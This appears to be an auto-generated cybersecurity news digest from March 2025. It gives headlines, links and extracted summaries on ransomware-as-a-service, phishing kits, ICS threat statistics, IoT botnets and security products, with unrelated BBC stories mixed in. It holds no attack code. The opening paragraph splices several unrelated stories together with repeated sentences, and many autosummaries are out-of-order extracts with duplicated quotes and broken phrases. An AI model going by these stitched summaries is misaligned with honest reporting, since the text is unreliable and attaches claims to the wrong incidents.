Infotainment System to Plant Spyware — NCC Group researchers Alex Plaskett and McCaulay Hudson have demonstrated a trio of zero-day exploits (CVE-2024-23928, CVE-2024-23929, and CVE-2024-23930) that could be weaponized to break into Pioneer DMH-WT7600NEX, gain shell access, and install malicious software on the in-vehicle infotainment (IVI) system.The vulnerabilities, collectively named SUN:DOWN, "can be exploited to execute arbitrary commands on devices or the vendor"s cloud, take over accounts, gain a foothold in the vendor"s infrastructure, or take control of inverter owners" devices.""These online forums or communities [...] see offenders collaborate or compete to cause harm across a broad spectrum of criminality – both on and offline – including cyber, fraud, extremism, serious violence, and child sexual abuse," the NCA said."These online forums or communities [...] see offenders collaborate or compete to cause harm across a broad spectrum of criminality – both on and offline – including cyber, fraud, extremism, serious violence, and child sexual abuse," the NCA said." — As many as 46 security bugs have discovered in products from three solar inverter vendors, Sungrow, Growatt, and SMA that, if successfully exploited, could permit attackers to seize control of devices and cause potential power blackouts. — Meta has announced that its AI-powered virtual assistant, Meta AI, is finally launching across Facebook, Instagram, WhatsApp, and Messenger in the European Union and United Kingdom over the coming weeks.Also called OrpaCrab, the sophisticated Linux-based backdoor is capable of surveillance, lateral movement, data exfiltration, system manipulation, and remote control.Also called OrpaCrab, the sophisticated Linux-based backdoor is capable of surveillance, lateral movement, data exfiltration, system manipulation, and remote control.The vulnerabilities, collectively named SUN:DOWN, "can be exploited to execute arbitrary commands on devices or the vendor"s cloud, take over accounts, gain a foothold in the vendor"s infrastructure, or take control of inverter owners" devices. "

  ---

  New Morphing Meerkat Phishing Kit Mimics 114 Brands Using Victims’ DNS Email Records

  financial industry
  2025-03-27 https://thehackernews.com/2025/03/new-morphing-meerkat-phishing-kit.html
  Cybersecurity researchers have shed light on a new phishing-as-a-service (PhaaS) platform that leverages the Domain Name System (DNS) mail exchange (MX) records to serve fake login pages that impersonate about 114 brands. DNS intelligence firm Infoblox is tracking the actor behind the PhaaS, the phishing kit, and the related activity under the moniker Morphing Meerkat. "The threat actor behind "

  Autosummary: "

  ---

  DeRISK Quantified Vulnerability Management evaluates cyber risks using business-level metrics

  exploits industry
  2025-03-26 https://www.helpnetsecurity.com/2025/03/26/derisk-quantified-vulnerability-management/
  

  DeNexus announced an innovative enhancement to its cyber risk management flagship solution DeRISK. The new DeRISK Quantified Vulnerability Management leverages advanced AI techniques to automatically and continuously mapping common vulnerabilities and exposures, or CVEs, to potential financial impacts, providing insights for cybersecurity teams. This new solution will revolutionize vulnerability management in OT environments by addressing the overwhelming challenge of prioritizing CVEs, reducing the task to only those that drive financial exposure, and transforming how organizations … More →

  The post DeRISK Quantified Vulnerability Management evaluates cyber risks using business-level metrics appeared first on Help Net Security.

  "

  Autosummary: “In addition to layering in exploit metrics like EPSS and KEV, we must understand the context and exposure of identified vulnerabilities—using DeRISK’s wealth of outside-in and inside-out data, we can now prioritize remediation at scale, while also having financial data to support risk-acceptance decisions.” "

  ---

  APT and financial attacks on industrial organizations in Q4 2024

  financial industry
  2025-03-25 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-q4-2024/
  Abusing of Telegram to spy and put pressure on their victims’ employees, notifying the victims by printing messages on printers connected to a compromised network – we publish interesting details of attacks on industrial enterprises disclosed at this quarter. "

  Autosummary: According to Trend Micro, Salt Typhoon targeted telecom, government, technology, consulting, chemical and transportation companies in Afghanistan, Brazil, Eswatini, India, Indonesia, Malaysia, Pakistan, the Philippines, South Africa, Taiwan, Thailand, U.S. and Vietnam. Middle East-related activity CISA alert on Iranian cyber actors The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Communications Security Establishment Canada (CSE), Australian Federal Police (AFP) and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a joint cybersecurity advisory regarding Iranian cyber actors that have been actively targeting organizations across various critical infrastructure sectors, including healthcare, public health, government, IT, engineering and energy, since October 2023.In total, eight modules were discovered, with targets from Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.Interlock ransomware samples have been spotted in India, Italy, Japan, Germany, Peru, South Korea, Turkey and the U.S., and victims have been found in the education, finance, government, healthcare, and manufacturing sectors.Additionally, the attackers exploited the following vulnerabilities: Atlassian Confluence RCE vulnerabilities (CVE-2023-22515, CVE-2023-22518), Zimbra vulnerability chain (CVE-2019-9670, CVE-2019-9621), MS Exchange vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and JetBrains TeamCity RCE vulnerability (CVE-2024-27198). Attacks by Akira/Howling Scorpius targeting medium-size organizations in various sectors, including construction, transportation and logistics, government, telecommunications, technology and pharmaceuticals, bypassed cybersecurity solutions through a mix of well-known techniques, such as Bring You Own Vulnerable Driver, and a new one targeting virtualized infrastructures protected with EDR solutions.The new Interlock ransomware, which has a version tailored for this OS, has been observed targeting industrial enterprises in India, Italy, Japan, Germany, Peru, South Korea, Turkey, and the United States.Initial access is achieved by exploiting vulnerable public endpoints using CVE-2023-46805, CVE-2024-21887 (Ivanti Connect VPN service), CVE-2023-48788 (FortiClient EMS), CVE-2022-3236 (Sophos firewall), CVE-2021-26855, CVE-2021-26857-6858 and CVE-2021-27065 (ProxyLogon). The attacks associated with all four group names (Shadow, Twelve, Comet, DARKSTAR) involved use of the same tools, like Cobint, gpo.ps1, similar strings in Windows tasks created for running malware, and ngrok as one of the backup channels for the access and execution of other malicious actions. Operation Cobalt Whisper SEQRITE Labs’ APT team has revealed an advanced cyber-espionage campaign known as Operation Cobalt Whisper, impacting multiple industries including defense, education, environmental engineering, electrotechnical engineering, energy, cybersecurity, aviation and healthcare in Hong Kong and Pakistan.In addition to GHOSTSPIDER, Salt Typhoon uses a set of proprietary and shared tools for complex multi-stage attacks: SNAPPYBEE (aka Deed RAT), SparrowDoor, CrowDoor and MASOL RAT for Linux, the DEMODEX rootkit, NeoReGeorg, frpc, and Cobalt Strike. According to Kaspersky telemetry, the threat actor has been active in Russia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Slovakia, and Turkey. When targeting defence, energy, governmental, pharmaceutical, insurance and legal sectors in Europe, Ukraine and the U.S. for espionage and cybercrime, RomCom exploited a chain of two zero-day vulnerabilities (one in the browser and one in the OS) that ended up with zero-click remote code execution.Affected industries include education, construction, consulting, transportation and logistics, government, telecommunications, technology and pharmaceuticals, with manufacturing being affected the most. RomCom attacks ESET researchers have linked Russia-aligned threat actor RomCom (aka Storm-0978, Tropical Scorpius, UNC2596), known for its opportunistic and targeted espionage operations, to a campaign exploiting two zero-day vulnerabilities: one in Mozilla Firefox (CVE-2024-9680) and the other in Microsoft Windows (CVE-2024-49039).The malware supports several plugins that can steal login and FTP credentials, email addresses, cookies, and other information from browsers, Outlook, Thunderbird, FileZilla and WinSCP.The Crypt Ghouls’ other toolset consists of common tools such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet tool, Resocks, AnyDesk, PsExec and others. "

  ---

  Q4 2024 – a brief overview of the main incidents in industrial cybersecurity

  industry ciber
  2025-03-25 https://ics-cert.kaspersky.com/publications/q4-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
  In Q4 2024, 107 incidents were publicly confirmed by victims. All of these incidents are included in the table at the end of the overview, with select incidents described in detail. Report at a glance Attacks leading to insolvency Kreisel Manufacturing | Denial of operations, insolvency | Ransomware German bulk material handling company Kreisel GmbH & […] "

  Autosummary: Stoli Group Manufacturing, food and beverage | Denial of operations, denial of IT services, data leakage, bankruptcy | Ransomware Stoli Group USA and Kentucky Owl, U.S.-based subsidiaries of the Luxembourg-based vodka manufacturer Stoli Group, filed for Chapter 11 bankruptcy on November 29, months after a ransomware attack disrupted their operations. Medion Manufacturing, electronics | Denial of operations, denial of IT systems, data leakage | Ransomware German electronic products supplier Medion AG, a subsidiary of Lenovo, a Chinese multinational technology company, became the target of a cyberattack.Countries with the highest number of reported incidents: USA: 81% (87 incidents) Germany: 6% (7 incidents) Japan: 4% (4 incidents) This quarter, we saw incidents in certain countries where we rarely see public confirmation of incidents: Costa Rica, Luxembourg, Latvia, Burkina Faso, and Pakistan. Other major incidents of interest Microlise Transportation, logistics| Denial of IT systems, denial of services | Ransomware Microlise, a British telematics and fleet management solution provider, was affected by the cyberattack known to have disrupted DHL’s store deliveries for the retailer NISA. Biggest impact prevented by responders TetraSoft Energy, mining | Denial of operations and services, supply chain / trusted partner A targeted cyberattack on TetraSoft, a Russian company that provides remote monitoring of hydrocarbon production and drilling, was detected and stopped.According to the company, the threat actors stole a total of 50,694 files from NPCV, including internal documents related to green procurement, health and safety, policies, and transactions, as well as emails from business partners.According to Financial Times, Serco, which handles the transport of prisoners for the Ministry of Justice, has seen vehicle tracking, panic alarms, navigation, and notifications related to estimated arrival times disabled. Incidents at large organizations Schneider Electric Energy, manufacturing | Personal data leakage | Ransomware On November 4, French energy management and automation solutions company Schneider Electric confirmed a cyberattack involving unauthorized access to one of its internal project execution tracking platforms hosted in an isolated environment following claims by the Grep (Hellcat) group of an incident involving the theft of 40 GB and a ransom demand. "

  ---

  ⚡ THN Weekly Recap: GitHub Supply Chain Attack, AI Malware, BYOVD Tactics, and More

  exploits industry
  2025-03-24 https://thehackernews.com/2025/03/thn-weekly-recap-github-supply-chain.html
  A quiet tweak in a popular open-source tool opened the door to a supply chain breach—what started as a targeted attack quickly spiraled, exposing secrets across countless projects. That wasn’t the only stealth move. A new all-in-one malware is silently stealing passwords, crypto, and control—while hiding in plain sight. And over 300 Android apps joined the chaos, running ad "

  Autosummary: This week"s list includes — CVE-2025-29927 (Next.js), CVE-2025-23120 (Veeam Backup & Replication), CVE-2024-56346, CVE-2024-56347 (IBM Advanced Interactive eXecutive), CVE-2024-10441 (Synology BeeStation Manager, DiskStation Manager, and Unified Controller), CVE-2025-26909 (WP Ghost), CVE-2023-43650, CVE-2023-43651, CVE-2023-43652, CVE-2023-42818, CVE-2023-46123, CVE-2024-29201, CVE-2024-29202, CVE-2024-40628, CVE-2024-40629 (JumpServer), and CVE-2025-0927 (Linux kernel) 📰 Around the Cyber World Google Releases OSV-Scanner 2 — Google has announced the release of an updated iteration of OSV-Scanner, its free vulnerability scanner for open-source developers.Aquatic Panda Attributed to 2022 Espionage Campaign — The China-aligned Aquatic Panda has been linked to a "global espionage campaign" that took place in 2022 targeting seven organizations in Taiwan, Hungary, Turkey, Thailand, France, and the United States.However, by the time this occurs, it may be too late, because sensitive information, such as an API token, may have already been transmitted in cleartext in the initial client request."However, by the time this occurs, it may be too late, because sensitive information, such as an API token, may have already been transmitted in cleartext in the initial client request.""Connections made over cleartext HTTP ports risk exposing sensitive information because the data is transmitted unencrypted and can be intercepted by network intermediaries, such as ISPs, Wi-Fi hotspot providers, or malicious actors on the same network," it noted."Connections made over cleartext HTTP ports risk exposing sensitive information because the data is transmitted unencrypted and can be intercepted by network intermediaries, such as ISPs, Wi-Fi hotspot providers, or malicious actors on the same network," it noted.T-Pot is a powerful, all-in-one honeypot platform that bundles 20+ honeypots with built-in dashboards, live attack maps, and threat analysis tools—no commercial license needed.With built-in subdomain discovery, traffic monitoring, and flexible CLI options, it"s a powerful free tool for security researchers and red teamers looking to automate smarter, context-aware testing."During the attack, the threat actor showed a sophisticated ability to overcome security challenges across multiple domains, including macOS malwares, AWS cloud compromise, application security and smart contract security.""During the attack, the threat actor showed a sophisticated ability to overcome security challenges across multiple domains, including macOS malwares, AWS cloud compromise, application security and smart contract security."To that end, organizations are expected to identify cryptographic services needing upgrades and build a migration plan by 2028, execute high-priority upgrades and refine plans as PQC evolves from 2028 to 2031, and complete migration to PQC for all systems, services and products from 2031 to 2035.To that end, organizations are expected to identify cryptographic services needing upgrades and build a migration plan by 2028, execute high-priority upgrades and refine plans as PQC evolves from 2028 to 2031, and complete migration to PQC for all systems, services and products from 2031 to 2035."The U.K."s demand of Apple raises a number of serious concerns which directly impact national security and therefore warrant robust public debate," according to a joint letter published by Senators Ron Wyden and Alex Padilla, along with Representatives Andy Biggs, Warren Davidson, and Zoe Lofgren."The U.K."s demand of Apple raises a number of serious concerns which directly impact national security and therefore warrant robust public debate," according to a joint letter published by Senators Ron Wyden and Alex Padilla, along with Representatives Andy Biggs, Warren Davidson, and Zoe Lofgren.Unlike traditional scanners, Rogue analyzes each target in real-time, adapting its tests based on responses and generating detailed, easy-to-read reports.Identifying ransomware, data theft, and disinformation as most acute hybrid cybercrime threats, the European police organization said that criminal groups are using cryptocurrency to launder money and move funds around, making their activities harder to detect.Identifying ransomware, data theft, and disinformation as most acute hybrid cybercrime threats, the European police organization said that criminal groups are using cryptocurrency to launder money and move funds around, making their activities harder to detect.Furthermore, third-parties on shared networks could intercept sensitive data from the plaintext HTTP request, or even carry out a Monster-in-the-Middle (MITM) attack by impersonating the web server. "

  ---

  VanHelsing RaaS Launch: 3 Victims, $5K Entry Fee, Multi-OS, and Double Extortion Tactics

  industry
  2025-03-24 https://thehackernews.com/2025/03/vanhelsing-raas-launch-3-victims-5k.html
  A ransomware-as-a-service (RaaS) operation called VanHelsing has already claimed three victims since it launched on March 7, 2025. "The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. Affiliates keep 80% of the ransom payments, while the core operators earn 20%," Check Point said in a report published over the weekend "

  Autosummary: The emergence of VanHelsing coincides with a number of developments in the ever-evolving ransomware landscape - The discovery of new versions of Albabat ransomware that go beyond Windows to Linux and macOS, gathering system and hardware information BlackLock ransomware, a rebranded version of Eldorado, has become one of the most active RaaS groups in 2025, targeting technology, manufacturing, construction, finance, and retail sectors BlackLock is actively recruiting traffers to drive early stages of ransomware attacks, directing victims to malicious pages that deploy malware capable of establishing initial access to compromised systems The JavaScript-based malware framework known as SocGholish (aka FakeUpdates) is being used to deliver RansomHub ransomware, an activity attributed to a threat cluster dubbed Water Scylla The exploitation of security flaws in Fortinet firewall appliances (CVE-2024-55591 and CVE-2025-24472) by a threat actor dubbed Mora_001 since late January 2025 to deliver a newly discovered ransomware strain codenamed SuperBlack, a modified version of LockBit 3.0 that utilizes a custom data exfiltration tool The Babuk2 (aka Babuk-Bjorka) ransomware group has been observed reusing data from earlier breaches associated with RansomHub, FunkSec, LockBit, and Babuk to issue fake extortion demands to victims According to statistics compiled by Bitdefender, February 2025 was the worst month for ransomware in history, hitting a record 962 victims, up from 425 victims in February 2024. "

  ---

  Whistleblower reveals oil giant"s "awful" pollution

  industry
  2025-03-20 https://www.bbc.com/news/articles/crewlj11jljo
  Colombia’s Ecopetrol polluted hundreds of sites, including water sources and wetlands, the BBC finds. "

  Autosummary: The BBC saw a black, oily-looking substance and containment barriers at one of the sites listed in the database as "only known to Ecopetrol" Ecopetrol"s CEO from 2017 to 2023, Felipe Bayón, told the BBC he strongly denied suggestions that there was any policy to withhold information about pollution.Pointing to it, Yuly Velásquez, president of Fedepesan, a federation of fishing organisations in the region, said: "This is all grease and waste that comes directly from the Ecopetrol refinery."We found turtles, capybaras, birds, thousands of dead fish," she said last June. Mr Olarte says he realised "something was wrong" soon after joining Ecopetrol Andrés Olarte, the whistleblower who has shared the company"s data, says pollution by the firm dates back many years."There is always that risk of some sort of contagion between the private security companies, the types of people they employ, and their desire to continually maintain their contract," Mr Smith says. "

  ---

  CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT

  industry
  2025-03-20 https://securityaffairs.com/175642/hacking/cert-ua-warns-ukrainian-defense-industry-dark-crystal-rat.html
  CERT-UA warns of a cyber campaign using Dark Crystal RAT to target Ukraine’s defense sector, including defense industry employees and Defense Forces members. The Computer Emergency Response Team of Ukraine (CERT-UA) uncovered a new cyber espionage campaign targeting employees of defense-industrial complex enterprises and representatives of the Defense Forces of Ukraine with Dark Crystal RAT. […] "

  Autosummary: The DCRat consists of three components: A stealer/client executable A single PHP page, serving as the command-and-control (C2) endpoint/interface An administrator tool In June 2022, the Governmental Computer Emergency Response Team of Ukraine (CERT-UA) warned of another malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. "

  ---

  Outseer introduces Behavioral Biometrics capability

  industry
  2025-03-19 https://www.helpnetsecurity.com/2025/03/19/outseer-behavioral-biometrics-capability/
  

  Outseer announced its platform-native Behavioral Biometrics capability. The addition of platformized Behavioral Biometrics introduces another layer of defense that continuously analyzes user interactions to detect anomalies in real time. Building on its rich RSA heritage (formerly RSA Fraud & Risk Intelligence), Outseer has enhanced its platform to counter modern cyber threats. As fraud evolves, spurred by the digitization of payments, the spread of personal data across the dark web, the growing threat of scams and … More →

  The post Outseer introduces Behavioral Biometrics capability appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Critical mySCADA myPRO Flaws Could Let Attackers Take Over Industrial Control Systems

  industry
  2025-03-19 https://thehackernews.com/2025/03/critical-myscada-mypro-flaws-could-let.html
  Cybersecurity researchers have disclosed details of two critical flaws impacting mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system used in operational technology (OT) environments, that could allow malicious actors to take control of susceptible systems. "These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially "

  Autosummary: "

  ---

  Borked Chromecasts are beginning to receive their update – just hope you didn’t do a factory reset

  industry
  2025-03-17 https://www.bitdefender.com/en-us/blog/hotforsecurity/borked-chromecasts-are-beginning-to-receive-their-update-just-hope-you-didnt-do-a-factory-reset
  The news can"t have come too soon for the many Chromecast users who have found themselves unable to stream their favourite TV shows, movies, and other media. Read more in my article on the Hot for Security blog. "

  Autosummary: "

  ---

  Threat landscape for industrial automation systems. Regions, Q4 2024

  industry
  2025-03-17 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-regions-q4-2024/
  The percentage of ICS computers on which malicious objects were blocked increased in eight regions. Regionally, the percentage ranged from 10.6% in Northern Europe to 31.0% in Africa. "

  Autosummary: This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. Regions ranked by percentage of ICS computers on which spyware was blocked, Q4 2024 In almost all regions, spyware does not rank higher than third in the threat category rankings by percentage of ICS computers on which it was blocked, except in the following regions: East Asia : in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked. Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q4 2024 All regions ranked by percentage of ICS computers on which malicious objects were blocked in the fourth quarter can be divided into three groups: Over 25% Africa – 31.0% South-East Asia – 30.1% Middle East – 25.7% In the regions within this group, OT computers are generally overexposed to cyberthreats. However, in Q4 2024, this category ranked higher than the corresponding global ranking (ninth place) in the following regions: South-East Asia – fifth place in the regional ranking place in the regional ranking East Asia – seventh place in the regional ranking The only three regions with growth in the percentage of ICS computers on which malware for AutoCAD was blocked were South-East Asia, South Asia, and Central Asia. , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Threat sources In Q4 2024, East Asia ranked first again among the regions by percentage of ICS computers on which malicious threats from network folders were blocked, surpassing the global average by 3.4 times (exceeding Q3 2024 levels). , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources In Q4 2024, Southern Europe again ranked first globally in the percentage of ICS computers where malicious threats from email clients were blocked, exceeding the global average by 2.4 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Spyware: by 1.3 times, ranked second globally in terms of growth. , the region also has a significantly higher percentage of ICS computers on which the following were blocked: Threat sources The region ranked second in the world by percentage of ICS computers on which threats from network folders were blocked, exceeding the global average by 2.9 times (surpassing Q3 2024 levels). Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked : in Q4 2024 was in the percentage of ICS computers on which the following were blocked Malicious scripts and phishing pages: by 1.3 times, first in the world in terms of growth. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Web miners: by 1.3 times, third globally in terms of growth. Changes in the percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Q4 2024 Covert cryptomining programs Web miners running in browsers The three leading regions by percentage of ICS computers on which web miners running in browsers were blocked were: the Middle East, Africa, and Eastern Europe. Changes in the percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q4 2024 Malicious documents Southern Europe, Latin America, and the Middle East ranked as the top three regions by the percentage of ICS computers on which malicious documents were blocked. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages: by 1.2 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages: by 1.2 times. Changes in the percentage of ICS computers on which denylisted internet resources were blocked, Q4 2024 Malicious scripts and phishing pages The top three regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were Africa, Southern Europe, and Latin America. Comparative analysis Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents: 2.2 times higher (surpassing Q3 2024 levels), ranked first by value among the regions. Changes in the percentage of ICS computers on which malicious documents were blocked, Q4 2024 Next-stage malware Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers. Regions ranked by percentage of ICS computers on which threats from email clients were blocked, Q4 2024 Denylisted internet resources Africa, South-East Asia, and Central Asia ranked as the top three regions by the percentage of ICS computers on which denylisted internet resources were blocked. Changes in the percentage of ICS computers on which spyware was blocked, Q4 2024 Covert cryptomining programs Miners in the form of executable files for Windows In the fourth quarter of 2024, similar to the previous quarter, a significant portion of Windows miners found on ICS computers consisted of archives with names mimicking legitimate software. , the region has a noticeably of ICS computers on which the following threat categories were blocked: Threat sources The region ranked third in the world by percentage of ICS computers on which threats from email clients were blocked, exceeding the global average by 1.7 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Spyware: by 1.2 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malware for AutoCAD: by 1.3 times. Comparative analysis Threat categories Compared to the global figures , the region has a noticeably higher percentage of ICS computers on which the following threat categories were blocked: Malicious documents: 1.9 times higher, ranked second by value among the regions. , the region has a of ICS computers on which the following were blocked: Threat sources South Asia ranks third globally by percentage of ICS computers on which malicious threats from removable devices were blocked, surpassing the global average by 1.8 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in was in the percentage of ICS computers on which the following were blocked: Ransomware: by 1.3 times. Comparative analysis Threat categories Compared to the global figures, the region has a higher percentage of ICS computers on which miners in the form of executable files for Windows were blocked: 1.5 times higher (surpassing Q3 2024 levels), ranked second by value globally. Comparative analysis Threat categories Compared to the global figures , the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents, 1.2 times higher (surpassing Q3 2024 levels). Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q4 2024 The top three regions in terms of growth in the percentage of ICS computers on which malicious scripts and phishing pages were blocked were Africa, Southern Europe, and the Middle East. Changes in the percentage of ICS computers on which worms were blocked, Q4 2024 Viruses The top three regions by percentage of ICS computers on which viruses were blocked remained South-East Asia, Africa, and East Asia. , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from removable devices were blocked exceeded the global average by 1.3 times in Q4 2024. Changes in the percentage of ICS computers on which web miners were blocked, Q4 2024 Ransomware The top three regions with the highest percentage of ICS computers on which ransomware was blocked were the Middle East, Africa, and South Asia. Comparative analysis Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Malware for AutoCAD: 3.8 times higher, ranked second by value globally. Comparative analysis Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Miners in the form of executable files for Windows: 2.1 times higher, ranks first by value globally. "

  ---

  Threat landscape for industrial automation systems. Q4 2024

  industry
  2025-03-17 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q4-2024/
  The percentage of ICS computers on which malicious scripts and phishing pages as well as ransomware were blocked continued to increase. "

  Autosummary: This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Сomputers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries.Main threat sources Internet 10.84% 9.98% ▼0.86 pp Email clients 2.95% 2.72% ▼0.23 pp Removable media 0.69% 0.64% ▼0.05 pp Network folders 0.11% 0.08% ▼0.03 pp Statistics across all threats In the fourth quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.1 pp from the previous quarter to 21.9%.Q4 in numbers Parameter Q3 2024 Q4 2024 Quarterly changes Global percentage of attacked ICS computers 22.0% 21.9% ▼0.1 pp Percentage of ICS computers on which malicious objects from different categories were blocked Malicious scripts and phishing pages (JS and HTML) 6.24% 7.11% ▲0.87 pp Denylisted internet resources 6.84% 5.52% ▼1.32 pp Spy Trojans, backdoors and keyloggers 3.91% 4.30% ▲0.39 ppThe most common are the chemical industry, metallurgy, ICS design and integration, oil and gas, energy, transport and logistics, food industry, light industry, pharmaceuticals. Percentage of ICS computers on which malicious objects were blocked, Jan 2023-Dec 2024 Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 10.6% in Northern Europe to 31% in Africa. Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024 Compared to the fourth quarter of 2023, the percentage decreased by 2.5 pp. Percentage of ICS computers on which malicious objects were blocked in selected industries Diversity of detected malicious objects Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose. "

  ---

  Cybersecurity classics: 10 books that shaped the industry

  industry ciber
  2025-03-13 https://www.helpnetsecurity.com/2025/03/13/cybersecurity-classics-books/
  

  Cybersecurity constantly evolves, but some books have stood the test of time, shaping how professionals think about security, risk, and digital threats. Whether you’re a CISO, a seasoned expert, or cybersecurity enthusiast, these must-reads belong on your shelf. Masters of Deception: The Gang That Ruled Cyberspace Author: Michele Slatalla Set against the backdrop of the 1990 AT&T phone network crash, Masters of Deception chronicles an important moment in hacker history: law enforcement cracked down on … More →

  The post Cybersecurity classics: 10 books that shaped the industry appeared first on Help Net Security.

  "

  Autosummary: Through meticulous research and firsthand interviews, Krebs unravels the rise of digital crime syndicates that flood inboxes with fraudulent pharmacy ads, malware, and phishing schemes—operations that steal identities, drain bank accounts, and even endanger lives. Author: Kim Zetter In Countdown to Zero Day, journalist Kim Zetter unravels the gripping story of Stuxnet, the world’s first true cyberweapon, a sophisticated piece of malware designed not just to steal data but to cause real-world destruction. "

  ---

  Catholics mark Pope"s 12th anniversary with prayers for his recovery

  industry
  2025-03-13 https://www.bbc.com/news/articles/cy0d599479do
  Pope Francis, who was elected on 13 March 2013, has been in hospital for the past month and has been improving in recent days. "

  Autosummary: Save Bethany Bell and Gillian Hazell BBC News, in Rome Reporting from Rome Share Save BBC Arianna, a student from Piacenza in Italy, said she had been "really concerned" about the Pope"s health Catholics around the world are marking the 12th anniversary of Pope Francis"s election as pontiff by praying for his recovery. "

  ---

  A dating app for video games tackles one of the industry"s big issues

  industry
  2025-03-11 https://www.bbc.com/news/articles/cr52rey0ng8o
  Ludocene is taking a cue from Tinder in an attempt to address a big problem for smaller developers. "

  Autosummary: "Having an approach that helps you discover things that give you a better sense of whether you"re going to like it allows you to invest your money, and for me, more importantly, your time in the things that you really enjoy," he says."And so what we"re hoping is not just to get the popular games everybody"s playing, but those kind of odd little games that would be a perfect match just for you," says Andy."Hopefully, they"re finding the things that existing algorithms are missing - really high quality games that didn"t quite get the marketing at launch or the media coverage," she says. "

  ---

  Armis acquires OTORIO to strenghten OT and IoT security

  industry
  2025-03-07 https://www.helpnetsecurity.com/2025/03/07/armis-otorio-acquisition/
  

  Armis has acquired OTORIO, a provider of OT/ ICS cyber security solutions. This accelerates Armis’ roll out of an on premise version of its Cyber Exposure Management platform, Armis Centrix and cements its leadership in cyber physical systems (CPS) security. Armis will fully integrate OTORIO’s Titan platform into Armis Centrix, delivering a single, comprehensive solution for critical infrastructure, manufacturing and industrial environments: Armis Centrix for OT/IoT Security (On-Prem) ensures robust, localised protection for air-gapped or … More →

  The post Armis acquires OTORIO to strenghten OT and IoT security appeared first on Help Net Security.

  "

  Autosummary: Secure remote access (SRA) : Enforce MFA, SSO, and access policies on all users, devices, workloads, applications, and data across all cloud, datacenter, and cyber-physical infrastructure. "

  ---

  New Eleven11bot botnet infected +86K IoT devices

  industry
  2025-03-05 https://securityaffairs.com/174941/malware/new-eleven11bot-botnet-infected-86k-iot-devices.html
  The Eleven11bot botnet has infected over 86,000 IoT devices, mainly security cameras and network video recorders (NVRs). Researchers from Nokia Deepfield Emergency Response Team (ERT) discovered a new botnet named Eleven11bot that has already infected over 86,000 IoT devices. Most infected devices are security cameras and network video recorders (NVRs), which are used to launch […] "

  Autosummary: New Eleven11bot botnet infected +86K IoT devices Pierluigi Paganini March 05, 2025 March 05, 2025 The Eleven11bot botnet has infected over 86,000 IoT devices, mainly security cameras and network video recorders (NVRs). "

  ---

  Researchers Link CACTUS Ransomware Tactics to Former Black Basta Affiliates

  exploits ransomware industry
